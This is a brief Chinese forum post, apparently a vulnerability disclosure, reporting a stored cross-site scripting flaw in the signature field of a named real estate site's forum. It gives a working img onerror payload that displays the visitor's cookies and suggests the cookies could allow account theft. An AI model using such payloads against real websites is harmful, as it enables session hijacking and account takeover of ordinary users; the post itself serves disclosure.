随便找一个论坛链接 http://home.focus.cn/msgview/1632/270131257.html 在个人签名处输入:   <p> <img height="0" onerror="alert(/亲,这里有个xss 漏洞你们知道吗/);alert(document.cookie)" src="#" width="0" />这个人很懒,留下个弹窗</p> 弹个小窗  cookie很多料,估计可盗号(没试,纯YY)
|
-
上一篇: TCCMS某处设计缺陷,成功打入官网后台 - 网站安全
下一篇: 腾讯视频主站分享至微信xss一枚,可cookie哦!
还没有人抢沙发呢~